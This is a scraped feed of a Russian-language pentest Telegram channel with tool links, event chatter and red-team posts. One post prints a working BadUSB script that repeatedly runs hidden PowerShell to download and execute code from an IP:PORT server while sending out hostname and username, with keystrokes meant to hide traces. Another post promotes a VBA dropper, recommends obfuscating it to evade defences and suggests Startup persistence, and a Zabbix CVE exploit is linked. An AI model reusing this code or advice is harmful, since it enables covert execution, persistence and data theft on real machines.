FCK HARDER – Telegram
FCK HARDER
998 subscribers
31 photos
1 video
33 links
TG: https://news.1rj.ru/str/e1tex

CHAT: https://news.1rj.ru/str/cht_harder

Dirty talks about pentest, python and hardware stuff/
FCK HARDER
Download Telegram
CUNP(Common UserName Profiler) 🕷

Туловина для генерации списка имен пользователей.
Писалась чисто под задачки, которые встречаются в работе повсеместно.
Из прикольных фитчтонкая настройка входящих данных: от количества пользователей, до шаблонов, по которым надо генерить список 😎

https://github.com/E1tex/CUNP

Enjoy!
TRY FCK HARDER 😈
Please open Telegram to view this post
VIEW IN TELEGRAM
❤‍🔥8👍5😈51👏1
Awesome-InfoSec-TG-channels 🤨

https://github.com/k0yt/Awesome-InfoSec-TG-channels

Интересный проект по парсингу ТГ каналов по теме киберсесурити. Там можно поискать всякие интересности или, например, подыскать коллег по цеху с целью взаимного продвижения каналов ))

Даже свое детище там нашел, между прочим, на 225 месте 😇
Правда без тега pentest lul >_<

TRY FCK HARDER 💀
Please open Telegram to view this post
VIEW IN TELEGRAM
11🤷‍♂2👨‍💻1🤗1
Pineapple with Eyes 👁👁

https://teletype.in/@e1tex/pineapplewitheyes

В данной статье мы рассмотрим сборку аппаратной закладки, которая не будет требовать прямого доступа к атакуемым системам - Wi-Fi Pineapple. Кроме того, мы изучим, как это устройство может быть задействовано не только при атаках на Wi-Fi сети, но и в качестве IP-камеры для наблюдения за объектами.

TRY FCK HARDER 👁
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥14👍5❤‍🔥22
Друзья, какой направленности доклад на PHD вам было бы интересно от меня услышать?🔜
Anonymous Poll
37%
⚫️Вебчик
46%
⚫️Физика/Хардварь
44%
⚫️Редтимчик/Байпасы АВшек и пр.
👍11💩5
non-typical PeneTration 🎹

https://teletype.in/@r00t_owl/hXHHVdpGeyY

Недавно принял участие в оч интересном проекте по физике, нам даже удалось отснять некоторые ключевые моменты, edit по которым мы уже закинули на ютаб, приятного просмотра:

https://www.youtube.com/watch?v=1N5WyC1qwtI

TRY FCK HARDER ☠️
Please open Telegram to view this post
VIEW IN TELEGRAM
11🏆3👾1
Красавица и HTML Injection. Почему HTMLi не только про дефейс 🚨

https://habr.com/ru/articles/804863/

Таки встретил свет мой лонгрид по HTML-инъекциям! Начинающие специалисты, набирайтесь терпения! А для продвинутых хакеров я сделал удобное оглавление, которым вы можете воспользоваться для изучения конкретно интересующей вас темы!

Приятного прочтения!

TRY FCK HARDER 🤩
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥13🍾4👍3💯2🏆2
VBA_Dropper 👀

Написал небольшой дроппер на VBA, который качает с сервера архив, распаковывает его в диру с рандомным названием, закидывает туда содержимое и запускает. Пользуйте, Друзья!
Только перед этим не забудьте чутка подобфусцировать его, чтобы точно дошел до адресата)

https://github.com/E1tex/VBA_Dropper.git

*Можете подредачить его, чтобы он, например, сразу распаковывал файл в Startup диру(?) 👍*

TRY FCK HARDER 🔥
Please open Telegram to view this post
VIEW IN TELEGRAM
8🔥6😁1
Лучший евент от лучших организаторов 🤡

Нереально на самом деле обидно за каждую команду из государства S, а, в частности, за четверку лучших его команд.

Помимо упомянутого в посте ниже, в программу лучшего евента от лучших оргов вошли:
1. Постоянные проблемы с брутом, неоднократно забывали закидывать необходимые креды в словари.
2. Дохлые хосты, как внутри лабораторной инфры, так и платформа для сдачи отчетов.
3. Баги, которые мешают сдать отчет.
4. Неожиданные сливы оргами инфы всем командам, на поиск которой, некоторые команды тратили драгоценное время.
5. Ну и, конечно, слухи о том, что некоторым командам непосредственно орги хинтили и сливали решение по таскам 🤡 А немного проанализировав, можно понять, что эти слухи не такие уж и безосновательные!)()9)0)

TRY FCK HARDER ☠️
Not Pay harder(((
Please open Telegram to view this post
VIEW IN TELEGRAM
🤯14👎4👍211
Forwarded from Ivan Bulavin
Друзья, сообщество Standoff.

Благодарим всех, кто играл сегодня с нами. Конечно же мы благодарим наших союзников, отличных ребят, экспертов своего дела, а также благодарим наших соперников, с которыми создали по-настоящему накаленную атмосферу.

Обращаемся к вам, чтобы обрамить наши последующие действия в понятный и доходчивый посыл: Мы не хотим дискредитировать вашу хорошую игру, но не согласны с тем, что организаторы обеспечили честную игру для каждой команды.

На этом мероприятии мы и вы наблюдали, следующие факты, не позволяющие признавать происходящее настоящим сравнением сил сторон.

1. Те риски, что не смогла реализовать Государство S были неподготовлены к игре и нерешабельны, другая часть рисков так и не была доступна для решения в ходе игры из-за ошибок в системах скада и работе сети.

2. Нашим соперникам досталось 3 сегмента сети для атак, которые весь год находились на полигоне 365, а заверения организаторов о том, что они обновили инфраструктуру и задачи не оказались правдой.

3. Организаторы знали, что команда Pr1me, которая с самого начала отказалась играть, и даже на этапе подготовки сообщила об этом, была включена в общий зачет. А в последствии принесла победное значение коэффициента команде государства F своим "внезапным" отсутствием.

Как утверждалось в презентации мероприятия: "Победит самое сплоченное государство". Определенно государство S вышло победителем в этой схватке, как самое сплоченное, сыгранное и объединившееся. Мы благодарим за игру наших соратников, мы также благодарим за игру наших соперников.

В сложившейся ситуации мы вынуждены принять решение об отказе от участия в дальнейших активностях мероприятия Standoff 13.

True0xA3 (ТруОАЗ)
53💔36🤯6👎31
BadUSB Check-Script 😈

Если во время выполнения работы по социальной инженерии — будь то через флешки или физику, — нам не требуется делать пробив, мы можем просто отправить запрос на подконтрольный сервер и залогировать входящие запросы.

Поскольку заказчику необходимо знать, кому проводить обучение после завершения кампании 😐, нам нужно собрать минимальную информацию о хосте, с которого был отправлен запрос. В скрипте ниже, используя переменные окружения, мы отправляем с виндовой тачки запрос, содержащий hostname и username.

Помимо сбора информации, такой подход помогает не потерять запросы, которые мы можем пропустить из-за надоедливых сканов со стороны Shodan, Censys и пр.

Скрипт, который я написал и активно использую, работает с модулем Paensy, разбор которого был ранее на канале:

#include <paensy.h>

void setup() {
delay(5000);
SetDelay(100);
while (true) {
delay(5000);
RunCommand("powershell -windowstyle hidden IEX (New-Object System.Net.WebClient).DownloadString('http://IP:PORT/%computername%/%username%')");
PressKey(KEY_ENTER, 1);
PressKey(KEY_ESC, 1);
Keyboard.press(KEY_LEFT_SHIFT);
Keyboard.press(KEY_LEFT_ALT);
Keyboard.releaseAll();
delay(500);
RunCommand("powershell -windowstyle hidden IEX (New-Object System.Net.WebClient).DownloadString('http://IP:PORT/%computername%/%username%')");
PressKey(KEY_ENTER, 1);
PressKey(KEY_ESC, 1);
Keyboard.press(KEY_LEFT_GUI);
Keyboard.press(KEY_SPACE);
Keyboard.releaseAll();
delay(500);
RunCommand("powershell -windowstyle hidden IEX (New-Object System.Net.WebClient).DownloadString('http://IP:PORT/%computername%/%username%')");
PressKey(KEY_ENTER, 1);
PressKey(KEY_ESC, 1);
PressKey(KEY_BACKSPACE, 1);
delay(1800000);
}
}

void loop() {
}


А для того, чтобы отлавливать запросы, мы можем использовать простой Python HTTP Server:

sudo PYTHONUNBUFFERED=x python3 -m http.server PORT &> ../http.server.log & echo $! > ../http.server.pid


Здесь мы:
1. Отключаем буферизацию вывода;
2. Перенаправляем как stderr, так и stdout в лог-файл;
3. Записываем pid в файл, чтоб не потерять его и спокойно убить процесс, в случае необходимости.

По основному скрипту:
1. Основной скрипт для Arduino меняет язык раскладки, используя всего два сочетания клавиш, что можно изменить по вашему усмотрению;

2. Если цель еще не на рабочем месте, можно вставить плату и забыть о ней— скрипт выполняется каждые полчаса в бесконечном цикле;

3. Нажатие же клавиш типа ESC,ENTER и BACKSPACE нужно для того, чтобы, если компьютер заблокирован, у таргета стирались те данные, которые были введены в процессе выполнения скрипта.
не палимся)

TRY FCK HARDER 🕺
Please open Telegram to view this post
VIEW IN TELEGRAM
👍11🔥82
ПРОНИКАЕМ НА ЗАЩИЩАЕМЫЙ ОБЪЕКТ

Всем Q, недавно совместно с @pro_pentest замутили небольшое интервью по прошедшему сольному проекту по физике:

Ссылка!

В прод попала чистейшая выжимка, так что, если такого рода контент залетит, будем дальше пилить и расширять подобный формат.

Интересных проектов много, так что рассказать точно будет о чем 😈

TRY FCK HARDER 🎉
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥14👍632
Стань инсайдером на OFFZONE 2024 💪

Всем привет, приближается оффзон, а это значит, что самое время начинать к нему готовиться!

Вместе с парнями с каналов @pro_pentest и @api_0 мы предлагаем Вам почувствовать себя в шкуре инсайдера, а так же побороться за крутые призы!

С деталями челленджа знакомьтесь в видосе:
https://youtu.be/WE-GAswXMUA

Увидимся на оффзоне!
TRY FCK HARDER 💪
Please open Telegram to view this post
VIEW IN TELEGRAM
118🔥62👍1
Все еще достоин.. 😮

Всем ку, давно не слышались!
В последнее время у меня были (и в ближайшее время будут 🤩) очень загруженные дни, которые не оставляли шанса запостить что-нибудь годное в канал. Основная проблема, в общем-то, и заключается в том, что сделать хочется качественно, но 24 часа в сутках, увы, не позволяют разорваться и преуспеть везде.

Это ни в коем случае не пост-оправдание, почему одмен проебывается и дропает так мало постов, скорее я просто хочу немного похвастаться и поделиться с вами своими успехами)

И такс, поехали, чем же занимался одмен все это время:

1. Вернулся к преподаванию
Удалось даже остаться в той стезе, в которой у меня уже был опыт - Python в Пентесте 🤓
*Уже даже есть фидбэк<3, спасибо любимым студентам, некоторые из которых подписаны и сейчас это читают*

2. Сдал BSCP 😮
Пасиба гайдам от товарища по цеху и хорошего друга Никиты - @wr3dmast3rvs. Абсолютно точно не я первый это скажу, но, по моим наблюдениям, гига важно на каждый потенциально уязвимый эндпоинт использовать Active Scan, а так же не забывать сразу ставить логинку на брут(вордлисты брал тут).
Уже после экзамена несколько раз ловил себя на мысли о том, как можно было бы без скана найти те или иные векторы, а в частности контексты внедрения.. Скорее всего, учитывая ограничения по времени, это близко, если и не к невозможному, то абсолютно точно к полной жопе, которую можно избежать, просто направляя запросы в Active Scan!

3. Сходил на Pentest Award 😎
Подавал свой кейс с использованием технологий DeepFaceLive во время социалки, который позволил мне попасть в шорт-листы и оставаться конкурентным участником в своей номинации(Ловись рыбка).
Не буду рассказывать про свой фидбэк, потому что не я сижу в жюри, но с некоторыми призовыми кейсами я был немного несогласен, думаю, кто смотрел, тот поймет.
В любом случае, спасибо ребятам за то, что позвали, а я в свою очередь пойду набирать багаж опыта, чтобы было чем поделиться на премии в следующем году)

А на этом пока все, годнота близко, и думаю, что скоро смогу запостить кое-что интересное по хардваре! still fck harder!

TRY FCK HARDER 🥳
Please open Telegram to view this post
VIEW IN TELEGRAM
23🔥11😁1
Forwarded from PRO:PENTEST
Поехали 😛
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥113👍3
Двигаем от второго выхода автозаводской 👊 Карточки все еще есть..
Please open Telegram to view this post
VIEW IN TELEGRAM
53
Forwarded from PRO:PENTEST
Ребята, всем спасибо за участие в нашем конкурсе🔥
Мы определили 3 победителей, которые завтра заберут у нас свои призы🔥🔥🔥

🚀1 место @scan87
🚀2 место @Casuaq
🚀3 место @mr4nd3r5on

Все участники поразили нас скоростью и профессионализмом. Благодарим всех! В следующий раз сделаем конкурс посложнее. Нам подсветили наши недочеты, а мы заметили как легко и играючи вы со всем справились☠️

Всем еще раз спасибо за участие! 🔥🔥🔥
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥92👍222
Разведка/кибер-диверсии/16 часов в розыске/угон авто на проектах по физическому пентесту

Под прошлым роликом по физическому проникновению было много комментариев о том, что хотелось бы более основательно углубиться в эту тему.
Комменты читаем, прислушиваемся, решили нашей скромной командой записать подкаст, в котором поговорили буквально обо всем)
пысы. Название говорит само за себя..🤡

https://www.youtube.com/watch?v=s9B9zxnMSzA

Смотрим, подписываемся, лайкаем и оставляем комментарии!

TRY FCK HARDER 🤩
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥1265👍1
gophishGroupsAdder 😩

Всем ку! Давно не виделись!
Думаю, очевидно, что 4 квартал никого не щадит)

Исходя из задачек и того материала, над которым в данный момент работаю, решил написать следующий простенький скриптец:

https://github.com/E1tex/gophishGroupsAdder

Мало кто любит бдсм вишинг, но нужен этот скрипт по большому счету только для этого.

В случаях, когда заказчик пуляет в вас миллион клиентов, которых надо будет отзвонить, а соответственно и таргетированно отослать письма, ручками заносить всех пользаков в разные группы было бы слишком долго. Тут вам и поможет gophishGroupsAdder, работающий на основе Gophish API. Enjoy!

TRY FCK HARDER ☺️
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥9632🤯1
Сети и системы передачи информации

Пожалуй, это один из лучших курсов, которые я когда-либо видел по практическим сетям. Сколько бы раз я ни рассказывал про него, всегда все просили поделиться ссылкой. И вот оно случилось: @sadykovildar дал добро (за что ему большое спасибо), а значит, ловите🎸

https://sadykov.notion.site/1-bb9630269fa14ce4b21f5b10339af168

Т.к. репа в ноушене, для просмотра лекционного материала, используйте VPN.

TRY FCK HARDER 👀
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥16👍82
CVE-2024-42327 😌

Немного опоздал, но, учитывая то, как забикс заполонил корпоративные сети и оценку уязвимости в 9.9 баллов по шкале CVSS, пок не утратил свою актуальность:

https://github.com/depers-rus/CVE-2024-42327

Для эксплуатации нужна валидная учетка с любой ролью, учетки которой могут взаимодействовать с апишкой.
Пок написан под постгрю, для других субд адаптируйте синтаксис запроса.

TRY FCK HARDER 😇
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥10👍543